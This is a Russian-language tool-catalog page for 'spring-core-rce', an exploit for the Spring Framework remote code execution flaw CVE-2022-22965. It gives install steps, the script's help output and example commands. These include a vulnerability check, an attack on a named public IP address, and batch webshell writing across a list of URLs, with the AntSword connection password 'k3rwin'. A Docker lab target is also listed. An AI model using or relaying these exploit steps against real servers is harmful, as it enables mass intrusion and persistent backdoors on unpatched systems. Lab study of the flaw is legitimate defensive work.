Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/k3rwin/spring-core-rce
РазведкаГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubk3rwin/spring-core-rce

spring-core-rce

Уязвимость RCE в Spring Framework CVE-2022-22965

Репозиторий
28114 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Spring Core RCE/CVE-2022-22965

Сфера влияния: Spring Framework и производные фреймворки на JDK>=9

Ссылка на статью

Скрипт предназначен только для изучения. Автор не несет ответственности за любое другое использование.

1.Установка

root@kitploit:~
pip3 install -r requirements.txt

2.Использование

root@kitploit:~
$ python3 spring-core-rce.py -h

 .----..-.-. .---. .-..-. .-..----.     .----. .---. .---. .----.     .---. .----..----.
{ {__-`| } }}} }}_}{ ||  \{ || |--' ___ | }`-'/ {-. \} }}_}} |__} ___ } }}_}| }`-'} |__}
.-._} }| |-' | } \ | }| }\  {| }-`}{___}| },-.\ '-} /| } \ } '__}{___}| } \ | },-.} '__}
`----' `-'   `-'-' `-'`-' `-'`----'     `----' `---' `-'-' `----'     `-'-' `----'`----'


                                                 Spring framework Core RCE
                                                                  By:K3rwin
usage: spring-core-rce.py [-h] [-u URL] [-s SYSTEM] [-r FILE]

Spring framework Core 0day RCE 帮助指南

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     指定url
  -s SYSTEM, --system SYSTEM
                        指定目标主机操作系统,默认linux,参数为win/linux
  -r FILE, --file FILE  指定url文件,批量写马

3.Пример

Неразрушающее обнаружение

-u,--url или используйте -f,--file для массового сканирования

-c,--check, укажите собственный HTTP-сервер, можно быстро создать веб-сервер с помощью python3 -m http.server 80

В основном используется во внутренней сети, когда требуется неразрушающее обнаружение уязвимости.

root@kitploit:~
python3 spring-core-rce.py -u "http://172.26.155.18:8080/" --check "http://172.26.155.18"

image-20220422153433867

Используйте -u, чтобы указать URL, -s, чтобы указать ОС. Параметры: linux или win, по умолчанию linux.

root@kitploit:~
python3 spring-core-rce.py -u "http://1.117.155.217:8080/" -s "linux"

image-20220331203209702

image-20220331203858753

Используйте -r для массовой записи шелл-кода, подключение через AntSword, пароль: k3rwin.

root@kitploit:~
python3 spring-core-rce.py -r "urls.txt"

image-20220402112140568

image-20220402112349943

4.Целевая среда

①.Локальная настройка Docker-полигона:

docker pull vulfocus/spring-core-rce-2022-03-29:latest

docker run -d -p 8080:8080 --name spring-core-rce -it vulfocus/spring-core-rce-2022-03-29

②.Онлайн-полигон

Скачать инструмент
spring-core-rce — Уязвимость RCE в Spring Framework CVE-2022-22965 | Kitploit